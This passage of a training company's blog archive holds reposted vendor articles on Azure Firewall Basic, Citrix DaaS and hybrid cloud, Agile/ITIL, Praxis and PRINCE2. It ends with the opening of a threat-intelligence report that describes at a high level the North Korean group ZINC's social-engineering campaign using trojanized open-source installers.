Author: Marbenz Antonio

Today in Preview is Azure Firewall Basic

Posted on by Marbenz Antonio

O que é o WAF - Web Application Firewall? | Lattine Group

Due to the acceleration of digital transformation and the increase in hybrid work, organizations are seeing an increase in the quantity and sophistication of cyberattacks. While businesses of all sizes confront similar security concerns, the development of remote work and new digital business models has made cybersecurity a key concern for small and medium-sized enterprises (SMBs). SMBs are particularly at risk because of their limited resources and a lack of professional security capabilities. According to a recent study, more than 60% of small businesses suffered a cyberattack and were made unavailable.

Microsoft is always coming up with new ideas to help secure customers’ digital assets in a changing, dangerous environment and support SMB users as they migrate to the cloud. They are excited to present the Azure Firewall Basic preview today.

A new SKU of Azure Firewall called Azure Firewall Basic was created to meet the requirements of SMBs by offering cost-effective enterprise-grade protection for their cloud environment. A stateful firewall as a service that is cloud-native, highly available, and allows users to centrally manage and report all of their traffic flows offers important aspects at scale.

Enterprise-grade security that is cost-effective and built for SMBs

Azure Firewall Basic comes with built-in threat intelligence from Microsoft Threat Intelligence, Layer 3-Layer 7 filterings, and warnings on malicious traffic. You can gain more visibility into your environment, recognize threats more quickly, and respond to them thanks to close interaction with other Azure services like Azure Monitor, Azure Events Hub, Microsoft Sentinel, and Defender for Cloud.

The importance of Azure Firewall Basic

Comprehensive, cloud-native network firewall security

  • filtering of network and application traffic.
  • intelligence on threats to notify about malicious traffic
  • High availability built-in.
  • interaction with other Azure services that is seamless.

Simple setup and is easy to use.

  • Just a few minutes to set up.
  • deploy automatically (deploy as code).
  • Automatic updates require zero maintenance.
  • Azure Firewall Manager provides centralized management.

Cost-effective.

  • designed to provide necessary, affordable firewall protection for your virtual network’s resources.

Visual graphic highlighting Azure Firewall Basic SKU capabilities.

Choosing the appropriate Azure Firewall SKU for your needs

Three different SKUs are now supported by Azure Firewall to meet a variety of customer use cases and preferences.

  • Azure Firewall Premium – is suggested to protect really sensitive applications (such as payment processing). Advanced threat security features including malware and TLS inspection are supported.
  • Azure Firewall Standard – is recommended for customers wanting Layer 3-Layer 7 firewalls that require auto-scaling to manage peak traffic times of up to 30 Gbps. Threat intelligence, DNS proxy, custom DNS, and web categories are supported enterprise capabilities.
  • Azure Firewall Basic – is advised for SMB users with throughput requirements under 250 Mbps.

Let’s analyze the features of the three Azure Firewall SKUs in more detail.

Table highlighting feature differences between Basic, Standard, and Premium SKUs.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in MicrosoftTagged Leave a Comment on Today in Preview is Azure Firewall Basic

How to Create Applications using Agile, DevOps, and ITIL

Posted on by Marbenz Antonio

Agile Requirements & Traceability Basics | Perforce

Results for customers are changing when new applications are developed using a combination of ITIL®, DevOps, and agile approaches.

While ITIL provides incident, problem, and change processes to the application development journey, DevOps and agile are enabling better communication, greater analysis of customer needs, and providing a quality solution.

In our experience, combining the various ways offers greater organization, service, and customer follow-up. Although certain businesses that are less familiar with ITIL may need to go through an education process, these businesses eventually come to appreciate the benefits of ITIL once they are exposed to certain services and realize they don’t have to “accept and adapt” ITIL in its totality.

App development in action

So, how does the combined method of developing apps function?

When a customer, for instance, requests a new application feature, our methodology helps us to develop a “story” that explains their request, such as “the customer wants to perform X because of Y.” Agile forces us to communicate these “storified” needs to the development team so they can better understand and concentrate on what the client needs. Additionally, it gives the client the ability to feel more interested in the result while enabling the development team to uncover technical solutions.

The agile component encourages us to deliver in numerous phases, which gives us more flexibility in creating new functionality for the customer. It is more concerned with quality and delivering the correct things than speed.

In the end, we’ve discovered that the strategy significantly affects the outcome: we are in constant communication with consumers and growingly productive. We produced 200 new functionalities for customer apps last year, which was a record-breaking accomplishment for a tiny development team.

Eliminating team silos has significantly altered the ethos of our own company. Customers now consider us as a solid group that works more successfully.

How can you make it work now that more businesses and government agencies are beginning to recognize the value of this hybrid ITIL, DevOps, and agile approach?

  1. Obtaining senior-level ownership
    When introducing new procedures, you require strong leadership and the support of managers.
  2. Developing project management skills
    Your employees must be willing to expand their skill sets through best practice training and certification programs, along with experience gained in real-world situations.
  3. A shift from technical to softer skills
    Now more than ever, a developer’s soft skills—such as listening, communicating, and understanding customer needs important. The ability to think analytically and strategically is just as important as writing code!
  4. Continual improvement of functionalities
    It’s important to translate concepts into practical applications and to be a skilled negotiator to bring along team members for ongoing advancement.
  5. Breaking down silos
    In large, public organizations where departments are not used to collaborating and communication is challenging, you could encounter some opposition to new techniques. You must dismantle these siloed techniques, even though it might take longer.

We have a focus on delivering quality improvements along with a process for handling issues and change thanks to the integration of ITIL, DevOps, and agile methodologies. It manages any defects that customers report through an incident handling mechanism, which allows developers to produce a patch.

Ultimately, the combined approaches are complementary, and we wouldn’t work any other way today.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in Agile, DevOps, ITIL 4Tagged , , , , Leave a Comment on How to Create Applications using Agile, DevOps, and ITIL

The reason Praxis is a Framework

Posted on by Marbenz Antonio

What do we mean when we say the Praxis Framework is 'Integrated'? | APMG International

What differentiates a Framework from a Body of Knowledge?

There are many bodies of knowledge, approaches, standards, and, more recently, frameworks available for project, program, and portfolio (P3M) management. But what do these identifying details practice classifications mean?

The short answer is that none of these publications can be completely explained, although certain general principles apply:

Body of Knowledge:

A body of knowledge (BoK) often only covers one of those three and explains the components that make up the disciplines of project, program, and portfolio management. Functions include things like stakeholder management, risk management, planning, and scope management. It is acknowledged that the profession, which consists of academics and practitioners, holds the entire corpus of knowledge. Publications on the body of knowledge are just introductions to that wealth of information and a place to start understanding its depth and breadth. A methodology must be used to apply the different functions described in a body of knowledge.

Examples include those created by the Project Management Institute and the Association for Project Management (APM) (PMI).

Methodology:

A methodology controls the creation, execution, and completion of a project or program. It is process-based and nearly always based on a lifecycle. The organizational roles that direct the processes and the supporting documentation are often defined in these publications. To put a methodology into practice, you must be able to comprehend the content within a body of knowledge.

Examples come from the Agile Business Consortium and Axelos, respectively, and are PRINCE2 and Agile Project Management.

Standards:

There are some different ways that standards can be produced by organizations like the International Standards Organization (ISO). They may include some of the methods and body of knowledge, but they are usually far less in-depth than those publications. Although it is tempting to believe that “standards”—such as ISO 9000 for quality or ISO 14000 for environmental management—can be used to evaluate or even accredit an organization, P3M has not yet done so. Something becomes a standard not because of its use or content, but because it is published by a standards organization (or occasionally by a government).

Examples are BS6079 from the British Standards Institute and ISO21500 from the ISO (BSI). Additionally, the American National Standards Institution (ANSI) has classified a chapter of the PMI’s body of knowledge as a standard. GovS002 is the “standard” for P3M used by the UK government.

Frameworks:

The concept of a framework is probably the most difficult of the four to define. The PMI BoK v6 was widely referred to as a framework as is the Scrum Guide, despite these being two completely distinct texts. The definition of a framework according to the dictionary is “a basic structure underpinning a system, concept, or text.”

With the Praxis Framework, they wanted to create a fundamental framework for managing projects, programs, and portfolios that would allow the addition of ever-more-useful content for people and organizations looking to enhance P3M delivery.

To manage projects, programs, and portfolios holistically, they first identified four key areas: knowledge, method, competence, and capability maturity. We introduced the fifth section, the Encyclopaedia because these four areas constantly refer to tools, approaches, and models that are typically not covered in the BoKs, procedures, or standards.

The next step was to develop a content management system that could reflect the integration of these domains and was flexible enough to add new parts as needed. The addition of Team Praxis (which illustrates how different personality types interpret all other instructions), Praxis 360 (the 360-degree capability maturity assessment tool), and the translation into eight different languages all quickly came into play.

Praxis is a Framework as a result of this. It is a framework for keeping track of and communicating a body of content that is expanding and changing for everyone involved in a project, program, and portfolio management. It has evolved into a “one-stop-shop” for the kind of content that, in the past, required you to compile many publications and then figure out how to combine their disparate terminologies and structures.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in APMGTagged Leave a Comment on The reason Praxis is a Framework

How to achieve the best of both worlds with a Hybrid DaaS Strategy

Posted on by Marbenz Antonio

Top 5 Strategies for Hybrid Cloud Success

All across the world, businesses are switching to the cloud to fulfill the needs of remote workers, improve flexibility and agility, cut costs, and streamline operations. But the decision as to whether and when to shift to the cloud changes from business to organization. Additionally, a lot of businesses lack the ability or desire to completely transition away from on-premise infrastructure.

A hybrid DaaS strategy can help in this situation.

For your virtual app and desktop environments, there isn’t a one-size-fits-all solution, but a hybrid DaaS strategy can give you the best of both worlds and let you design a space that meets the particular requirements of your company.

Are there any legal or regulatory standards that your company must follow? Sensitive software and data may be kept on-site in a data center. Do you want to lower the physical infrastructure’s footprint and streamline IT operations? For you, switching to a public cloud service provider might make sense. Or maybe you are aware that at least some of your operations should be moved to the cloud, but you lack the resources to do it all at once. Your best option is probably a hybrid of on-premises and cloud.

Whatever your requirements, Citrix provides the DaaS and VDI solutions to assist you in putting into practice the strategy that is most appropriate for your company, at the scale you require, and on your schedule. Citrix can assist you in streamlining IT management while providing excellent employee experiences without sacrificing security. We not only make it simple to transfer to the cloud and integrate on-premises and cloud resources, but we also give you a range of options so you can make changes at the speed and scale that work best for your business.

Learn More

Learn more about how Citrix can assist you in reaping the benefits of both on-premises VDI and cloud-based DaaS in our Desktop Delivery Breakdown.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in CitrixTagged Leave a Comment on How to achieve the best of both worlds with a Hybrid DaaS Strategy

Citrix Workspace Browser for Delivering Enterprise Web Apps

Posted on by Marbenz Antonio

Citrix Workspace (@CitrixWorkspace) / Twitter

Businesses spent a lot of time and money updating software and trying to suit how employees wanted to work when consumerization of IT was the newest big thing. Many of those adjustments made it easier for people to work each day. The web browser served as the lowest common denominator throughout all of these new endpoints, allowing BYO device users, non-corporate PCs, corporate workstations, mobile devices, and third parties to access company resources.

It was a great goal to work toward. Everyone is familiar with using a browser, they are commonly available for free, and there was hardly any entry barrier. However, there is a drawback: they were created with consumer needs, not business needs, in mind. To secure their most valuable asset, their intellectual property, businesses are searching for security features like clipboard controls, fine-tuned data download and upload policies, and the ability to impose watermarks.

Citrix’s Enterprise Browser Explained

Citrix Workspace Browser is a Chromium-based enterprise browser created to give protected access to SaaS apps and corporate websites as well as security from data loss and cyberattacks as part of a complete zero trust strategy. The browser is designed to be used on both managed and unmanaged BYO devices and runs locally on Windows and Mac computers. Without requiring IT to handle every endpoint device, it offers the right endpoint to control.

Citrix Workspace Browser Features

  • installed locally for a genuine native experience on the user’s device
  • Per-app VPN-less access to corporate web resources while limiting unauthorized lateral network connections
  • Apply data loss prevention (DLP) measures contextually, such as clipboard access controls, upload/download limitations, watermark enforcement, blocking screen capture, and printing controls
  • Protection against keyloggers helps stop malware from logging keystrokes and reduce password theft
  • Web filtering for unidentified URLs with allowed, forbidden, or restricted viewing

The Adaptive Authentication service can be used by Citrix Workspace Browser to enable quite well, contextual enforcement for the above features. IT administrators can, for instance, implement contextual policies to provide various access levels based on BYOD or corporate-managed devices. For additional security, insights, and enforcement options, Citrix Workspace Browser can additionally provide the Citrix Analytics service with extensive logging information.

Citrix Workspace Browser: Only Part of the Story

A complete zero trust network access (ZTNA) solution, Citrix Secure Private Access, comes with Citrix Workspace Browser. We are aware that some apps in your environment are still client-server applications that have not entirely migrated to web platforms. The Secure Access Agent can offer contextual, per-app access to internal resources for those apps.

Citrix Workspace Browser is already installed as part of the Citrix Workspace app because it is a component of our bigger app delivery strategy. Additionally, Citrix DaaS or Citrix Virtual Apps and Desktops are not necessary. The secure delivery of internal web and SaaS apps is now possible without the need for additional VDA servers, infrastructure, or third-party licenses. (A free software connector appliance is required for access to internal web apps.)

Citrix Workspace Browser is an addition to the services already offered to Citrix DaaS users. Web and SaaS apps are provided as tiles in the same workspace as virtual apps. The majority of Citrix users already have Citrix Workspace Browser installed as part of the Citrix Workspace software; Citrix Secure Private Access is the only need for its use. Using a single platform, Citrix administrators and architects can now manage both classic virtual apps and web and SaaS apps.

Web and SaaS apps set by Secure Private Access are supplied to the mobile enterprise browser built within the iOS and Android Citrix Workspace apps. This makes it perfect for BYO devices because it offers secure access without device enrolment or MDM.

Additional Security Capabilities

Use Citrix Secure Browser if you need to give people access to resources that you don’t want running on your network or that could be dangerous. Citrix hosts the browser in a secure data center and builds an air-gap barrier between your users and the potentially dangerous information, even though it employs the same enterprise browser technology.

The Citrix Analytics service is also tightly integrated with the Citrix Secure Private Access portfolio. You may send detailed activity logs to Citrix Analytics for Security, which enables you to keep an eye on things like user behavior, potential data exfiltration, and improbable traveler scenarios. These inputs enable our service to provide a user risk score, which can then be added as another input to the contextual access engine to ensure the right level of access at the right time.

Learn more

Users can access all of their browser-based work apps in one location with Citrix Workspace Browser thanks to SSO, and they have the freedom to work securely from any device. Users can keep personal surfing separate and gain from having a browser for professional apps.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in CitrixTagged Leave a Comment on Citrix Workspace Browser for Delivering Enterprise Web Apps

Which is Better for your Company—On-Premises or Cloud?

Posted on by Marbenz Antonio

Microsoft Dynamics 365 ON-PREMISE vs CLOUD- What is the best ERP deployment for your business? – Global iTS

The ideal infrastructure for deploying virtual apps and desktops is being considered by many organizations. Essentially, there are two options: on-premises solutions, cloud solutions, or a combination of both. Is one preferred over the other, on-premises or cloud? VDI on-premises, which allows IT departments control over their environments, necessitates routine maintenance and can be challenging to scale up. Desktop as a Service (DaaS) models for cloud computing lower the cost of physical infrastructure and IT complexity.

Each infrastructure has benefits and drawbacks. The needs of your firm and a few other considerations will determine which model is appropriate for your business. In this article, we’ll examine some of the most important parts to take into account when choosing between on-premises computing and the cloud.

On-Premises vs. Cloud: Pros and Cons

Both on-premises and cloud computing have significant advantages that can be used to meet the unique requirements of your company.

On-premises  Cloud
Resources deployment  Resources are deployed in-house. Resources are deployed on a third-party server.
Cost Requires upfront investment. Most cloud providers use a pay-as-you-go model.
Scalability  The use of physical servers limits the scalability of this model. Scalability is one of the main advantages of cloud deployments. The cloud makes it easy to add more resources on demand.
Data security  Enables the organization to control all data and deploy preferred security restrictions. Control of data security is offloaded to the cloud provider with the ability for organizations to add specific security policies.
Compliance Regulations often require regulated industries to keep data on-premises. Cloud providers keep the environment constantly updated with compliance regulations, especially data privacy.

What is an On-Premises Environment?

On-premises, computing is a computer approach where software and data are kept and used on actual company-owned hardware. Datacenters, business servers, and networking systems are the most typical uses. The phrase also refers to software and applications created internally by a company.

Pros of On-Premises Environments

  • Infrastructure control: Organizations have complete control over their infrastructure when using on-premises environments. They can choose who has access to the program and data, where they are stored, and what operations can be carried out.
  • Security: It can provide you more control because all of your data and resources are kept on hardware that you own. Access to hardware, software, and network resources can be provided, regulated, and restricted by the IT team.
  • Compliance: Some sectors have more strict privacy and regulatory rules that call for storing the data on-site.
  • Efficiency: Keeping an on-premises architecture has benefits such as low latency to users near the data center and few external dependencies.

Cons of On-Premises Environments

On-premises deployments are not suitable for everyone for some reasons. When choosing your infrastructure, take into account the following:

  • Scalability: The main disadvantage of maintaining an on-premises infrastructure in a developing organization is this. You must purchase new hardware each time you need to add a new resource, which adds time and expense. It can be difficult to adjust to unexpected needs when using an on-premises infrastructure.
  • Infrastructure costs: It might be expensive upfront to build an on-premises infrastructure, and it can be challenging to forecast the needs. If you desire more room, you must weigh the expense of the additional server against the demands on the available resources. If you overprovision, your capacity will go unused.
  • Maintenance: All maintenance and updates must be performed by your IT personnel, which puts them under pressure or overburdened and increases the likelihood of errors and security holes.
  • Security: While working on-site will give you more control over the network and equipment, it is also more prone to human error and security threats.
  • Reliability: As a result of the necessity for maintenance, your IT team may make mistakes that decrease reliability.

On-Premises Environments Use Cases

For many different types of enterprises, an on-premises infrastructure may be the answer. Think about these important use cases, which can necessitate or justify maintaining hardware.

  1. You have low uptime requirements: Having a local infrastructure makes financial sense if your business just needs a few servers and the majority of its users are based in one place. Additionally, running the servers in a converted office rather than purchasing generators can be financially wise if you can accept a little downtime in the event of a power loss or maintenance.
  2. You have high-demand workloads: Common use cases for maintaining an on-site data center include businesses that depend on graphically intensive desktop virtualization. Many businesses choose to maintain their network equipment and VDI servers on-site to guarantee performance. They can also use graphics cards for tasks that require lots of graphics. As was already indicated, this ensures greater control and avoids latency issues.
  3. Your organization has a large number of devices and tools connected via ethernet: For instance, a lot of machine tools and equipment are connected via ethernet connection in manufacturing organizations. For these machines to function properly with local hardware and applications, latency must be kept to a minimum.

What is Cloud Computing?

In cloud computing, a different company—the cloud provider—provides servers and data storage services. The upkeep and security of the cloud environment are a shared duty between businesses and cloud providers. The company is in charge of managing the data and services they utilize, while the cloud providers typically take care of infrastructure and storage upkeep.

Most cloud service providers offer a combination of the three basic types of cloud computing models, which there are.

  • Infrastructure as a Service (IaaS): You utilize the virtual machines (VMs), storage, networks, operating systems, and servers of the provider.
  • Platform as a Service (PaaS): The cloud vendor offers on-demand services for software development, including application testing, delivery, and deployment.
  • Software as a Service (SaaS): Customers can access the cloud vendor’s subscription-based services through a web server. Updates and upkeep are frequently included in the price.

Other technologies are usually present in cloud computing environments:

  • Containers: All software component dependencies are integrated through packets, which operate separately from the on-premises environment.
  • Serverless: With the help of this service, users can use application components just when they need them, conserving resources.
  • Workloads: These are the cloud-based programs, services, and assets, which also include virtual machines and databases.

Cloud Computing’s Biggest Benefits Over On-Premises Deployments

Many businesses may find that moving to the cloud is the best course of action since it offers the flexibility required to manage complicated settings properly.

What advantages do moving to a cloud computing environment offer? To name a few:

Cloud Solutions Enable Scalability

The simplicity of provisioning is one of the cloud’s top benefits. Instead of taking days or weeks, new resources and storage, for instance, can be added instantly. This adaptability enables businesses to swiftly scale up or down in response to sudden changes in demand.

Cloud Computing Imparts Cost Savings

One more affordable choice is the cloud. To begin with, moving to the cloud has no up-front infrastructure costs. Pay-as-you-go pricing is the norm among cloud service providers. It eliminates idle equipment costs since you only pay for the resources you use, not for the resources you already have. Finally, knowing that you’ll only be charged for what you use will help you more accurately budget the expense of your migration. To get you started, check out this excellent calculator.

Cloud Solutions Simplify Systems Management

Systems administration, particularly security-related activities, is made simpler by cloud computing models’ abstraction of the hardware’s compute, storage, and network layers. Administrators can employ the strong security controls most cloud providers have in place to restrict access and evaluate vulnerabilities.

Cloud Computing Improves Availability and Uptime

High availability is another benefit of moving to the cloud. Most cloud providers promise at least 99.9% uptime in their service agreements if your workload and regular tasks demand that you never experience downtime.

Security is Enhanced in the Cloud

Cloud security operates on a shared responsibility basis. While clients are in charge of the security in the cloud, such as limiting access to data, the network, and storage, service providers look after the security of the cloud resource.

Strict security controls are often in place at cloud providers to identify vulnerabilities and protect the infrastructure. In a cloud setting, it’s also simpler to run security updates, compliance updates, and other patches. One of the ways switching to the cloud might improve security is due to its flexibility.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in CitrixTagged Leave a Comment on Which is Better for your Company—On-Premises or Cloud?

Planning a Hybrid Cloud Migration: 6 Important Steps

Posted on by Marbenz Antonio

6 Steps to Migrate to the Cloud

Are you thinking about shifting some of your on-site workloads to the cloud? Hybrid cloud environments are becoming more popular among businesses. They may take advantage of the cloud’s benefits while still making use of their current data center expenditures thanks to this. The reasons why businesses choose to function in hybrid cloud settings are listed below, along with the actions you need to follow to develop a hybrid cloud strategy and ensure a successful hybrid cloud migration.

Why Do Businesses Choose Hybrid Cloud Environments?

The norm is shifting toward hybrid work. IT teams have not been able to keep up while the majority of businesses have adjusted operational processes to prosper in this new work environment. According to a study by Citrix, managing the speed of digital acceleration while investing in cybersecurity is a key priority for 29% of IT workers. For businesses that want to maintain security while enjoying the advantages of maintaining a hybrid work environment, this management is becoming more and more important. Organizations aiming to expedite their digital transformation while remaining secure have been forced to adopt a hybrid cloud strategy to deliver virtual apps and desktops to users wherever. Here are four advantages that businesses can take advantage of if their hybrid cloud migration is successful.

Agility

Technology develops quite fast. This means that procedures and systems that are seen as efficient right now might not be in a few years. Decision-makers and IT teams can host infrastructure wherever they choose, adapt rapidly, and easily move processes to more affordable, quicker, and more efficient clouds should the opportunity or need to arise.

Scalability

Hybrid cloud architectures are extremely scalable and flexible to each business’s requirements and particular business operations. While some applications may have unpredictable workloads and demands, others may have specialized requirements that may only be met by a certain cloud model. A hybrid cloud architecture enables businesses to scale operations with the right cloud structure and create models that are customized to the requirements of each application while keeping costs to a manageable level.

Security

Hybrid cloud models are widely regarded as the most secure cloud solution accessible by industry professionals. Less sensitive operational data can be retained in highly effective public cloud settings, whereas organizations that must follow strict compliance rules when collecting customer data can store such information on-premises or within highly secure and carefully managed cloud environments.

Integration

Every application used by a company is optimized for a particular cloud environment. As a result, businesses that use a lot of programs are occasionally forced to accept lesser performance gains in exchange for application interoperability. Companies can get around this problem by using a hybrid cloud infrastructure that enables applications to function in the environments that they desire while maintaining interoperability through specialized integration layers.

Reasons to Start a Hybrid Cloud Migration Use Cases for Hybrid Cloud

Industry leaders are aware of the advantages of hybrid cloud, but it’s equally important for smaller businesses to know when to start a hybrid cloud migration. Here are a few typical use cases where a hybrid cloud would be useful.

Dynamic Workloads

Workloads and operational procedures are typically very dynamic in quickly expanding organizations. Access to a public cloud enables businesses to maintain their flexibility and scalability while sensitive operations are safely carried out in a controlled private cloud setting. Companies can adapt to changing workloads thanks to a hybrid cloud architecture, which also provides the security needed to keep sensitive customer and operational data secure in a protected environment.

Big Data

Big data operations and analytics are frequently used by businesses to enhance operations, customer service, marketing, and more. These analyses usually call for the integration of data from different sources. An anyone cloud environment is not suitable for use due to the volume of information and the need for security. These ostensibly incompatible requirements can be satisfied in a hybrid cloud setting. Hybrid cloud resources can assist business leaders in maintaining security and scalability to fit their specific demands, while integrations can give them a complete picture of business information.

Staged Migration

Businesses usually have to change needs that need to be periodically assessed. It is important that IT teams have the flexibility to modify cloud structures if business teams require it as they assume increased responsibility for deployment, vendor evaluation, and purchasing. A hybrid cloud environment enables businesses to regularly assess whether the cloud services they have chosen can satisfy their demands and, if necessary, change their selected configuration.

Compliance Requirements for Data Security

Resources in the public cloud are readily available and suitable for many corporate applications. The highly regulated private cloud environments are an option for companies that deal with sensitive customer or operational information. For these reasons, it’s important that these firms work in a hybrid cloud environment.

Being able to have it all

Benefits for users of public and private clouds are very distinct and very specialized. Business requirements, however, are constantly changing. Businesses have the flexibility to use hybrid clouds to reap those advantages as needed. Utilizing a hybrid approach enables businesses to pick and select the components from each cloud environment that best suit specific applications inside their business.

6 Steps for Planning a Hybrid Cloud Migration

There is a need to take into account the policies and conditions of an infrastructure offered by the cloud vendor that you cannot control when a business decides to develop a hybrid cloud strategy and migrate to a hybrid cloud environment. The hybrid cloud is effective, but you must get ready to go. The following six measures can aid in a seamless transition.

Select the Hybrid Cloud Strategy That Is Best For You

A successful cloud migration starts with figuring out how each team will accomplish its objectives. Depending on how well each program can serve the needs of the organization, it may be rehosted, modified, or completely rebuilt. Cost and efficiency are just a couple of the various considerations. Each migration strategy can have significantly different resource requirements, so each organization must choose the one that works best for them.

Identify the Applications That Are Prepared for a Hybrid Cloud Migration

Different programs are used by organizations daily. Before being migrated to the cloud, each application has a distinct amount of complexity and will affect different integrations. Teams must plan the extent to which each application is prepared for migration and determine how many components of each application are ready to be transferred to the cloud.

Select the Internal Teams and Applications You Will Move

Applications and procedures are made to enable team members to work to their full potential. To benefit from the flexibility, some teams, like marketing or development, may be prepared for their workloads to go to the cloud. To reduce interruption, it’s also a good idea to shift to the cloud first some applications that are important to everyday operations and whose team members work remotely. This might also signal the start of a gradual, staged move to the cloud.

Consider What Data to Store On-Premises and in the Cloud

Different datasets from each company must be treated differently. While some information needs more security, others must be prepared for ongoing analysis. Business teams must choose which data will be stored locally and which data is ready to be transferred to the cloud in both scenarios.

Make Sure Your Hybrid Cloud Migration Has a Reliable Network Connection

Any kind of cloud environment depends on a regular and dependable network connection to give important stakeholders access to information. Business owners must ensure that employees have access to a consistent and dependable network connection so that they may benefit from a cloud environment with the least amount of disturbance and downtime.

Monitor and Analyze Key Metrics Regularly

Because hybrid clouds are flexible, corporate teams can change course and their approach if their goals are not being achieved. Because of this, it’s important for companies to systematically and commonly assess important KPIs when deciding which cloud configuration to use.

How Citrix Makes It Simple to Build the Best Hybrid Cloud Environment for Your Business

Companies undertaking digital transformation may pick, implement, and start a successful hybrid cloud migration using Citrix DaaS with ease. Businesses must adjust to the operational and security problems brought on by the growing number of remote workers. Citrix, a pioneer in the field, has over 30 years of virtual desktop and application experience. This experience has led to the development of well-optimized, highly adaptable DaaS and VDI solutions that are designed with the requirements of contemporary workplaces in mind.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in CitrixTagged Leave a Comment on Planning a Hybrid Cloud Migration: 6 Important Steps

Obtaining a PRINCE2 Practitioner is Important

Posted on by Marbenz Antonio

Six Sigma and PRINCE2: How are they different? | Invensis Learning

While PRINCE2 Foundation teaches the methodology, the Practitioner level is all about application—right up to the exam, which requires you to use what you’ve learned to solve a case study. This entails adapting the theory to a project’s “environment” and applying the method’s guiding principles appropriately.

Project managers need to have a new perspective and concentration while planning out a project’s lifetime, and to do that, you should be Practitioner-certified.

The PRINCE2 Practitioner difference

Before enrolling in the PRINCE2 Practitioner program, we had been working in project management for a considerable amount of time.

It helped me by keeping all the ideas in mind and, in particular, by customizing the approach to ensure that it was effective for the given assignment.

Being an “all-rounder” as a project manager means adhering to the PRINCE2 principles and not skipping or forgetting to complete tasks that are important to any project. Again, for this reason, we keep the book close by to test me and make sure that I am truly managing a PRINCE2 project rather than one that is “PRINCE2 in name only.”

Governance for good project “health”

The goal of applying PRINCE2 governance is to make a project successful.

A project environment that is safe and secure is produced through effective governance. For instance, it is crucial to guarantee that a senior user from the company is represented on the project board. This ensures that the appropriate expertise is available to offer advice before initiating a change process and that management is actively participating throughout the initiatives, rather than just passively through the use of dry, written reports.

Project outcomes are sometimes not “black and white,” but rather “grey,” and this degree of uncertainty usually places the project manager in a challenging position when determining the project’s course. Therefore, knowing a PRINCE2 Practitioner enables you to make decisions based on the information at hand and assures you that you do so while using organized thinking and keeping the project’s overall success in mind.

Observations from the PMO

Whether or not they are project managers, everyone completes the PRINCE2 Foundation certification. Since many of our projects are PRINCE2-based, they must comprehend the tenets, procedures, and lingo we use.

Our full-time project managers, however, are all PRINCE2 Practitioner certified. As a result, we’ve seen how they develop a greater sense of awareness of their role as project managers: they are more meticulous, communicate more effectively, and truly follow the proper procedures when beginning a new project.

Our project managers can make projects more visible and facilitate better talks with the project board about any challenges that have arisen thanks to their increased expertise and qualification.

In the end, the flexibility to involve the project board ensures that the project manager has the support, guidance, and extra resources they require at the appropriate time.

 

Here at CourseMonster, we know how hard it may be to find the right time and funds for training. We provide effective training programs that enable you to select the training option that best meets the demands of your company.

For more information, please get in touch with one of our course advisers today or contact us at training@coursemonster.com

Posted in PRINCE2Tagged Leave a Comment on Obtaining a PRINCE2 Practitioner is Important

ZINC’s use of open-source software as a weapon

Posted on by Marbenz Antonio

Corrupted open-source software enters the Russian battlefield | ZDNET

Microsoft has recently discovered a variety of social engineering activities by an actor we trace as ZINC that weaponized legal open-source software. In the US, UK, India, and Russia, the Microsoft Threat Intelligence Center (MSTIC) has detected activities aimed against employees of businesses in a variety of industries, including media, defense and aerospace, and IT services. ZINC, a state-sponsored organization based in North Korea with goals centered on espionage, data theft, financial gain, and network devastation, is the group MSTIC most confidently links this campaign to based on the observed tradecraft, infrastructure, tooling, and account affiliations.

Starting in June 2022, ZINC used conventional social engineering techniques by initially establishing connections with people on LinkedIn to build trust with their targets. After establishing a link, ZINC urged users to keep in touch using WhatsApp, which served as the vehicle for spreading their malicious payloads.

MSTIC saw ZINC using a variety of open-source programs, such as the installers for muPDF/Subliminal Recording, Sumatra PDF Reader, KiTTY, TightVNC, PuTTY, and KiTTY, to carry out these assaults. ZINC was seen making an effort to migrate laterally and exfiltrate data from target networks. Since June 2022, the actors have successfully compromised some organizations. Mandiant also reported on the ongoing campaign with the weaponized PuTTY earlier last month. ZINC might represent a serious threat to people and organizations across all industries and countries because of the widespread use of the platforms and software it uses in its campaign.

Comprehensive defense against ZINC-specific tools and malware is offered by Microsoft Defender for Endpoint, including ZetaNile. Customers will be able to thoroughly search their environments for pertinent signs with the help of the hunting questions provided at the end of this article. Microsoft directly informs customers who have been targeted or hacked, giving them the information they need to secure their accounts, just like with any observed nation-state actor action.

Who is ZINC?

ZINC is a nation-state activity organization that is highly operational, destructive, and sophisticated. The action group, which has been active since 2009, increased its level of public awareness in 2014 as a result of its successful attack on Sony Pictures Entertainment. Microsoft has identified FoggyBrass and PhantomStar as two of the customized remote access tools (RATs) used by ZINC in their inventory.

ZINC actors have been seen to mostly use spear-phishing, according to Microsoft researchers, but they have also been seen to use social engineering on social networking platforms and targeted website compromises to further their goals. ZINC targets employees of the companies it is trying to infiltrate and attempts to persuade them to open weaponized documents that include dangerous macros or install seemingly innocent apps. Security researchers have also been the targets of targeted attacks on Twitter and LinkedIn.

ZINC assaults seem to be driven by conventional cyberespionage, data theft from individuals and businesses, monetary gain, and corporate network devastation. Increased operational security, sophisticated malware that changes over time, and politically motivated targeting are just a few of the characteristics that ZINC attacks share with state-sponsored activities.

From late April through mid-September 2022, ZINC, also known as Labyrinth Chollima and Black Artemis, was seen carrying out this campaign.

Attack chain diagram of ZINC campaign showing steps and related activities
Figure 1. Attack flow diagram for the recent ZINC campaign

Observed actor activity
